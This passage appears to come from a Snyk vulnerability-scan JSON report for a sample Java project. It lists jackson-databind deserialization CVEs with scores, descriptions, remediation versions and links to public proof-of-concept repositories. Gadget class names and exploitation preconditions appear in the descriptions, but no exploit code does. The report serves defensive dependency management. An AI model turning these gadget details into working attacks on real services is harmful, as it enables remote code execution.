`com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + 
"socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 
8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + 